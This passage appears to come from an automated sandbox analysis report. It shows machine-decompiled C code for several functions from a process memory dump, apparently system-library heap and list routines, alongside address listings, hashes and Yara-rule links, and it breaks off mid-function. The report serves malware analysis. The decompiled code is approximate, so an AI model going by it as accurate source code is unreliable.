							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L048D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E048FF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L048D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                            0x0498740d
                                                            0x0498740d
                                                            0x04987412
                                                            0x04987413
                                                            0x04987416
                                                            0x04987418
                                                            0x0498741c
                                                            0x0498741f
                                                            0x04987422
                                                            0x04987422
                                                            0x04987428
                                                            0x0498742a
                                                            0x0498742a
                                                            0x04987451
                                                            0x04987432
                                                            0x0498744f
                                                            0x0498744f
                                                            0x00000000
                                                            0x04987434
                                                            0x04987438
                                                            0x04987443
                                                            0x04987517
                                                            0x04987517
                                                            0x0498751a
                                                            0x04987535
                                                            0x04987520
                                                            0x04987527
                                                            0x0498752c
                                                            0x04987531
                                                            0x04987533
                                                            0x00000000
                                                            0x04987533
                                                            0x00000000
                                                            0x04987531
                                                            0x0498754b
                                                            0x0498754f
                                                            0x0498755c
                                                            0x0498755c
                                                            0x0498755f
                                                            0x04987560
                                                            0x04987561
                                                            0x04987562
                                                            0x04987563
                                                            0x04987568
                                                            0x0498756a
                                                            0x0498756c
                                                            0x0498756d
                                                            0x0498756d
                                                            0x0498756f
                                                            0x04987572
                                                            0x04987574
                                                            0x04987577
                                                            0x0498757c
                                                            0x0498757f
                                                            0x00000000
                                                            0x04987551
                                                            0x04987551
                                                            0x04987551
                                                            0x04987553
                                                            0x04987553
                                                            0x04987449
                                                            0x04987449
                                                            0x0498744c
                                                            0x0498744c
                                                            0x00000000
                                                            0x0498744c
                                                            0x04987443
                                                            0x0498750e
                                                            0x04987514
                                                            0x04987514
                                                            0x04987455
                                                            0x04987469
                                                            0x0498746d
                                                            0x00000000
                                                            0x04987473
                                                            0x04987473
                                                            0x04987476
                                                            0x04987480
                                                            0x04987484
                                                            0x0498748e
                                                            0x04987493
                                                            0x04987493
                                                            0x04987496
                                                            0x04987499
                                                            0x049874a1
                                                            0x049874b1
                                                            0x049874b5
                                                            0x00000000
                                                            0x049874bb
                                                            0x049874c1
                                                            0x049874c1
                                                            0x049874c4
                                                            0x049874c5
                                                            0x049874c6
                                                            0x049874c7
                                                            0x049874c8
                                                            0x049874cd
                                                            0x00000000
                                                            0x049874d3
                                                            0x049874d3
                                                            0x049874d6
                                                            0x049874d8
                                                            0x049874db
                                                            0x049874dd
                                                            0x049874e0
                                                            0x049874e7
                                                            0x049874ee
                                                            0x049874ee
                                                            0x049874f4
                                                            0x049874f9
                                                            0x00000000
                                                            0x049874fb
                                                            0x049874fb
                                                            0x049874fd
                                                            0x04987500
                                                            0x04987503
                                                            0x04987505
                                                            0x04987505
                                                            0x049874f9
                                                            0x00000000
                                                            0x049874cd
                                                            0x049874b5
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                            • Instruction ID: 0427688b4c09740da0e2b5be403b26cca7edc027bf7092e0c3c59d28e52d4576
                                                            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                            • Instruction Fuzzy Hash: 46517C71600606EFDB15DF58C880A56BBB9FF45304F24C5BAE908DF252E371E946CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048E4D3B, Relevance: .1, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E048E4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x49ad360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E048FFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x49a7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E048FB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L048D4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E048BCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E048FB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E048FF380(_t67 + 0xc, 0x4895138, 0x10) == 0) {
								 *0x49a60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E048E4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E048E4E70(0x49a86b0, 0x48e5690, 0, 0) != 0) {
					_t46 = E048BCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                            0x048e4d3b
                                                            0x048e4d4d
                                                            0x048e4d53
                                                            0x048e4d58
                                                            0x048e4d65
                                                            0x048e4d6c
                                                            0x048e4d71
                                                            0x048e4d77
                                                            0x048e4d7f
                                                            0x048e4d8c
                                                            0x048e4d8e
                                                            0x048e4dad
                                                            0x048e4db0
                                                            0x048e4db7
                                                            0x048e4db8
                                                            0x048e4db9
                                                            0x048e4dba
                                                            0x048e4dbb
                                                            0x048e4dc1
                                                            0x048e4dc8
                                                            0x048e4dcc
                                                            0x048e4dd5
                                                            0x048e4dde
                                                            0x048e4ddf
                                                            0x048e4de0
                                                            0x048e4de1
                                                            0x048e4de6
                                                            0x048e4de7
                                                            0x048e4de9
                                                            0x048e4df3
                                                            0x00000000
                                                            0x00000000
                                                            0x04926c7c
                                                            0x04926c8a
                                                            0x04926c8a
                                                            0x04926c9d
                                                            0x04926ca7
                                                            0x04926cac
                                                            0x04926cb2
                                                            0x04926cb9
                                                            0x00000000
                                                            0x04926cbf
                                                            0x04926cbf
                                                            0x00000000
                                                            0x04926cbf
                                                            0x04926cb9
                                                            0x048e4dfb
                                                            0x04926ccf
                                                            0x04926cd3
                                                            0x048e4e32
                                                            0x048e4e39
                                                            0x04926ce0
                                                            0x04926cf2
                                                            0x04926cf2
                                                            0x04926ce0
                                                            0x048e4e3f
                                                            0x048e4e41
                                                            0x048e4e51
                                                            0x048e4e51
                                                            0x048e4e03
                                                            0x048e4e03
                                                            0x048e4e09
                                                            0x048e4e0f
                                                            0x048e4e57
                                                            0x00000000
                                                            0x00000000
                                                            0x048e4e1b
                                                            0x048e4e30
                                                            0x048e4e5b
                                                            0x048e4e5b
                                                            0x00000000
                                                            0x048e4e30
                                                            0x048e4e11
                                                            0x048e4e11
                                                            0x048e4e16
                                                            0x00000000
                                                            0x048e4e16
                                                            0x048e4e01
                                                            0x00000000
                                                            0x048e4e01
                                                            0x048e4da5
                                                            0x04926c6b
                                                            0x00000000
                                                            0x048e4dab
                                                            0x048e4dab
                                                            0x00000000
                                                            0x048e4dab

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1035592fe8bc24454f871b7f6069b444be56d01e1721571c0975e0523e214d3f
                                                            • Instruction ID: cae3bc03b1069578f1d64a089cd14110df763ab1762a1358e7f8cdabfe7ef1bd
                                                            • Opcode Fuzzy Hash: 1035592fe8bc24454f871b7f6069b444be56d01e1721571c0975e0523e214d3f
                                                            • Instruction Fuzzy Hash: BE41E371A40318AFEB21DF15CD80F76B7A9EB45B14F000AAAE949D7280D7B4FD44CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048C8A0A, Relevance: .1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 94%
                                                            			E048C8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x49ad360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E048FB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E048CE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x4891180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E048E1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E048F3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E048C8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                            0x048c8a0a
                                                            0x048c8a1c
                                                            0x048c8a23
                                                            0x048c8a2e
                                                            0x048c8a30
                                                            0x048c8a36
                                                            0x048c8a3c
                                                            0x048c8a3e
                                                            0x048c8a4a
                                                            0x048c8a52
                                                            0x048c8a9c
                                                            0x048c8aae
                                                            0x048c8a58
                                                            0x048c8a5e
                                                            0x048c8a6a
                                                            0x048c8a6f
                                                            0x048c8a75
                                                            0x048c8a7d
                                                            0x048c8a85
                                                            0x048c8a86
                                                            0x048c8a89
                                                            0x048c8a93
                                                            0x048c8a99
                                                            0x048c8a9b
                                                            0x00000000
                                                            0x048c8aaf
                                                            0x048c8abe
                                                            0x048c8ac3
                                                            0x048c8acb
                                                            0x048c8ad7
                                                            0x048c8ae0
                                                            0x048c8af1
                                                            0x00000000
                                                            0x048c8af1
                                                            0x048c8acd
                                                            0x048c8ad5
                                                            0x048c8afb
                                                            0x048c8afd
                                                            0x048c8aff
                                                            0x048c8b07
                                                            0x048c8b22
                                                            0x048c8b24
                                                            0x048c8b2a
                                                            0x048c8b2e
                                                            0x048c8b3f
                                                            0x048c8b78
                                                            0x048c8b41
                                                            0x048c8b52
                                                            0x048c8b54
                                                            0x048c8b5c
                                                            0x048c8b74
                                                            0x048c8b74
                                                            0x048c8b5c
                                                            0x048c8b3f
                                                            0x048c8b5e
                                                            0x048c8b61
                                                            0x048c8b64
                                                            0x048c8b64
                                                            0x048c8b6c
                                                            0x048c8b6c
                                                            0x048c8b11
                                                            0x04919cd5
                                                            0x04919cd5
                                                            0x048c8b17
                                                            0x048c8b1a
                                                            0x048c8b1a
                                                            0x00000000
                                                            0x048c8ad5
                                                            0x048c8a89

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 64f7a4a7f7ab34e0525c9752566daba0652e72dc096e22e7c0e34388637718a8
                                                            • Instruction ID: 3bb0ed71e201525d5f89fc696d77358bf27dd1a8d98818e1571fd2a9c5ebb98c
                                                            • Opcode Fuzzy Hash: 64f7a4a7f7ab34e0525c9752566daba0652e72dc096e22e7c0e34388637718a8
                                                            • Instruction Fuzzy Hash: 2D4143B1A4022C9BDB24DF59CC88AA9B7F4EF44305F104AE9E919D7251E770EE84CF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F3D43, Relevance: .1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048F3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E048C7B60(0, _t61, 0x48911c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E048C7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L048D4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                            0x048f3d4c
                                                            0x048f3d50
                                                            0x048f3d55
                                                            0x048f3d5e
                                                            0x0492e79a
                                                            0x00000000
                                                            0x0492e79a
                                                            0x048f3d68
                                                            0x0492e789
                                                            0x048f3d9d
                                                            0x048f3da3
                                                            0x048f3daf
                                                            0x048f3db5
                                                            0x048f3dbc
                                                            0x048f3dc4
                                                            0x048f3dc9
                                                            0x048f3dce
                                                            0x0492e7ae
                                                            0x0492e7ae
                                                            0x048f3dde
                                                            0x048f3de2
                                                            0x048f3de7
                                                            0x048f3e0d
                                                            0x048f3e13
                                                            0x048f3e16
                                                            0x048f3e1e
                                                            0x048f3e25
                                                            0x048f3e28
                                                            0x00000000
                                                            0x00000000
                                                            0x048f3e2a
                                                            0x048f3e2f
                                                            0x048f3e37
                                                            0x048f3e37
                                                            0x00000000
                                                            0x048f3e37
                                                            0x048f3e31
                                                            0x00000000
                                                            0x048f3e31
                                                            0x048f3e20
                                                            0x048f3e20
                                                            0x048f3e35
                                                            0x00000000
                                                            0x048f3de9
                                                            0x048f3de9
                                                            0x048f3de9
                                                            0x048f3dee
                                                            0x048f3dfd
                                                            0x048f3dff
                                                            0x048f3e02
                                                            0x048f3e05
                                                            0x048f3e05
                                                            0x00000000
                                                            0x048f3df0
                                                            0x048f3de7
                                                            0x0492e78f
                                                            0x0492e794
                                                            0x048f3d79
                                                            0x048f3d84
                                                            0x048f3d89
                                                            0x048f3d8e
                                                            0x00000000
                                                            0x0492e7a4
                                                            0x048f3d96
                                                            0x048f3d9a
                                                            0x00000000
                                                            0x048f3d9a
                                                            0x00000000
                                                            0x0492e794
                                                            0x048f3d6e
                                                            0x048f3d73
                                                            0x00000000
                                                            0x0492e7b5
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d92215ca5ada7738b3eeda55dbff26407a609398715778ecd199c14d4e190be
                                                            • Instruction ID: 4a31f0e4dbf1608e06059c2794e727a2aa36ea637c618328b77334d0c35ee01e
                                                            • Opcode Fuzzy Hash: 3d92215ca5ada7738b3eeda55dbff26407a609398715778ecd199c14d4e190be
                                                            • Instruction Fuzzy Hash: B231D031B01625DBDB249F29CC81A2ABBE8EF85704B058A7EED45CB750E730E840D790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048EA61C, Relevance: .1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E048EA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x4990220);
				E0490D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x49a7b9c; // 0x0
				_t55 = L048D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0490D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x49a7b10 =  *0x49a7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x49a536c; // 0x378d28
					if( *_t51 != 0x49a5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x49a5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x49a536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E048EA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                            0x048ea61c
                                                            0x048ea61e
                                                            0x048ea623
                                                            0x048ea628
                                                            0x048ea62b
                                                            0x048ea62d
                                                            0x048ea648
                                                            0x048ea64a
                                                            0x048ea64f
                                                            0x04929b44
                                                            0x048ea6ec
                                                            0x048ea6f1
                                                            0x048ea6f1
                                                            0x048ea655
                                                            0x048ea657
                                                            0x048ea65a
                                                            0x048ea65d
                                                            0x048ea662
                                                            0x048ea663
                                                            0x048ea667
                                                            0x048ea668
                                                            0x048ea66d
                                                            0x048ea706
                                                            0x048ea706
                                                            0x04929bda
                                                            0x04929be6
                                                            0x04929beb
                                                            0x00000000
                                                            0x04929beb
                                                            0x048ea679
                                                            0x04929b7a
                                                            0x00000000
                                                            0x04929b7a
                                                            0x048ea683
                                                            0x048ea6f4
                                                            0x048ea6f7
                                                            0x048ea6f9
                                                            0x048ea6fd
                                                            0x048ea6a0
                                                            0x048ea6a0
                                                            0x048ea6ad
                                                            0x048ea6af
                                                            0x048ea6b4
                                                            0x04929ba7
                                                            0x04929bac
                                                            0x00000000
                                                            0x00000000
                                                            0x04929bc6
                                                            0x04929bce
                                                            0x04929bd1
                                                            0x04929bd3
                                                            0x04929bd3
                                                            0x00000000
                                                            0x04929bd1
                                                            0x048ea6bd
                                                            0x048ea6c3
                                                            0x048ea6c6
                                                            0x048ea6d2
                                                            0x048ea701
                                                            0x048ea704
                                                            0x00000000
                                                            0x048ea704
                                                            0x048ea6d4
                                                            0x048ea6d6
                                                            0x048ea6d9
                                                            0x048ea6db
                                                            0x048ea6e1
                                                            0x048ea6e6
                                                            0x048ea6e8
                                                            0x048ea6e8
                                                            0x048ea6ea
                                                            0x00000000
                                                            0x048ea6ea
                                                            0x048ea688
                                                            0x048ea692
                                                            0x048ea694
                                                            0x048ea699
                                                            0x00000000
                                                            0x00000000
                                                            0x048ea69d
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 02e9eae936294c06c975cf9e1bb865a0a923ffbf411afa4873606dd3b87d6a10
                                                            • Instruction ID: 9e2373dd7da24dcbabfd81b0dc9a7d98b48b88c072db543ea4cea47a5f279a18
                                                            • Opcode Fuzzy Hash: 02e9eae936294c06c975cf9e1bb865a0a923ffbf411afa4873606dd3b87d6a10
                                                            • Instruction Fuzzy Hash: 714145B5A04219DFDB18CF59C990BA9BBF1BB8A704F1586A9E804EB344D774B901CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04937016, Relevance: .1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 76%
                                                            			E04937016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x49ad360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04936B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
